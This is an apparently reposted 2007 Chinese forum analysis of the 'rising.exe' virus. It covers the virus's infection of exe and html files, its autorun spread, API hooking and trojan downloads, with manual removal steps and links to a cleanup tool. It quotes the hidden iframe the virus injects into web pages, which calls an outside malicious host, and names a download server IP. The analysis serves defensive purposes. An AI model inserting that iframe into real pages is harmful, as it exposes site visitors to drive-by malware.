查看文章 |
修改系统时间并感染exe成为番茄花园的病毒(rising.exe)的处理(提供专杀下载)zz
2007年05月04日 星期五 15:21
转载自 剑盟http://bbs.janmeng.com/viewthread.php?tid=573807&extra=page%3D1 作者:newcentury 今天发现此种病毒求助者见多 收到样本后 利马测试了一下
该病毒就是前些日子流行的 修改系统时间的病毒之变种 此次变种可谓是集N种破坏性病毒之大成了 主要破坏功能有:1.感染exe 并使得被感染的exe的公司等属性变为 番茄花园 2.感染html asp 等文件 插入恶意代码 3.通过双击磁盘启动 4.下载木马,盗取网游帐号 5.修改注册表 使系统无法显示隐藏文件 6.通过hook API 函数 导致任务管理器中 无法看见其进程 分析报告如下: File: rising.exe Size: 64775 bytes File Version: 1.00 MD5: 86311B37D938BB35645E7B092014DD63 SHA1: 47C324A5A691DD31DC0410E51ADBD35065E6C7C3 CRC32: 88ABBD9B rising.exe 运行后 首先释放一个rising.eve的文件 然后由rising.exe启动他 之后 释放139CA82A.EXE 139CA82A.dll(随机的8个数字字母组合成的文件名)到系统文件夹 注册服务139CA82A.EXE 139CA82A.EXE控制winlogon进程 使得139CA82A.dll插入几乎所有进程 释放rising.exe 和autorun.inf 到每个分区 使得双击磁盘启动 感染 除系统分区外的exe文件 使得其公司名全变为 番茄花园 感染 html asp 等文件 在其后面插入代码 <iframe src="http://web.yulett.cn/count.htm" width="0" height="0" frameborder="0"></iframe> 修改系统时间 随机把年份往前调 月,日不变 修改 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue: 值为 0x00000000 导致无法显示临时文件 rising.exe 还会hook 多个 API函数 使其进程在任务管理器中隐藏 使用Explorer.exe连接网络 61.152.92.98:80下载木马 下载的木马一般为K117815XXXXX.exe XXXXX代表随机 到系统文件夹 由于 每台机器上下载的木马的名称不同 但最后结果相同 所以中间释放的过程省略 最后 这些木马运行后分别释放了如下文件 C:\WINDOWS\system32\buchehuo.exe(创建了服务inetsvr) C:\WINDOWS\system32\cmdbs.dll C:\WINDOWS\cmdbs.exe C:\WINDOWS\system32\Kvsc3.dll C:\WINDOWS\Kvsc3.exe C:\WINDOWS\system32\mppds.dll C:\WINDOWS\mppds.exe C:\WINDOWS\system32\msccrt.dll C:\WINDOWS\msccrt.exe C:\WINDOWS\system32\winform.dll C:\WINDOWS\winform.exe C:\WINDOWS\system32\winsock.exe 临时文件夹下 释放upxdnd.exe和upxdnd.dll 解决办法: 安全模式下(开机后不断 按F8键 然后出来一个高级菜单 选择第一项 安全模式 进入系统) 首先把系统日期 改回来 然后打开sreng 启动项目 注册表 删除如下项目 <upxdnd><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\upxdnd.exe> [] <msccrt><C:\WINDOWS\msccrt.exe> [] <cmdbs><C:\WINDOWS\cmdbs.exe> [] <mppds><C:\WINDOWS\mppds.exe> [] <Kvsc3><C:\WINDOWS\Kvsc3.exe> [] <winform><C:\WINDOWS\winform.exe> [] “启动项目”-“服务”-“Win32服务应用程序”中点“隐藏经认证的微软项目”, 选中以下项目,点“删除服务”,再点“设置”,在弹出的框中点“否”: 139CA82A / 139CA82A Wireless Zero Conflguration / inetsvr 把下面的 代码拷入记事本中然后另存为1.reg文件 Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL] "RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced" "Text"="@shell32.dll,-30500" "Type"="radio" "CheckedValue"=dword:00000001 "ValueName"="Hidden" "DefaultValue"=dword:00000002 "HKeyRoot"=dword:80000001 "HelpID"="shell.hlp#51105" 双击1.reg把这个注册表项导入 然后双击我的电脑-工具-文件夹选项-查看-显示所有文件和文件夹,把“隐藏受保护的系统文件”的勾去掉。 右键 点击C盘 点击右键菜单中的“打开”打开C盘 (千万不要双击)(如图) 删除 如下文件 C:\rising.exe C:\autorun.inf C:\WINDOWS\system32\buchehuo.exe C:\WINDOWS\system32\cmdbs.dll C:\WINDOWS\cmdbs.exe C:\WINDOWS\system32\Kvsc3.dll C:\WINDOWS\Kvsc3.exe C:\WINDOWS\system32\mppds.dll C:\WINDOWS\mppds.exe C:\WINDOWS\system32\msccrt.dll C:\WINDOWS\msccrt.exe C:\WINDOWS\system32\winform.dll C:\WINDOWS\winform.exe C:\WINDOWS\system32\winsock.exe C:\WINDOWS\unspapik.txt C:\WINDOWS\wiasevct.txt C:\WINDOWS\wiasvctr.txt C:\WINDOWS\ganran.txt C:\WINDOWS\system32\139CA82A.DLL(随机的8个数字字母组合成的文件名) C:\WINDOWS\system32\139CA82A.EXE(随机的8个数字字母组合成的文件名) C:\WINDOWS\system32\K117815XXXXX.exe(XXXXX代表随机数字) 清空C:\Documents and Settings\用户名\Local Settings\Temp 右键 点击分别打开系统分区以外的分区 还是点击右键菜单中的“打开” (千万不要双击) 删除每个分区下面的autorun.inf和rising.exe文件 最后使用专杀 全盘杀毒 下载地址 1、http://teyqiu.5d6d.com/viewthread.php?tid=339&extra=page%3D1 2、 http://free.ys168.com/?newcenturysun 网盘 威金熊猫番茄专杀 下面的威金熊猫通用终结器 或者附件中下载 声明 此专杀 只是修复exe文件 而不针对 rising.exe文件 以及他们下载的木马 所以必须在彻底清除了 rising.exe 以及 所有木马后在安全模式下使用 sreng下载地址 http://www.kztechs.com/sreng/download.html [ 本帖最后由 newcentury 于 2007-5-4 08:09 编辑 ] |
最近读者:
本篇日志被作者设置为禁止发表新评论
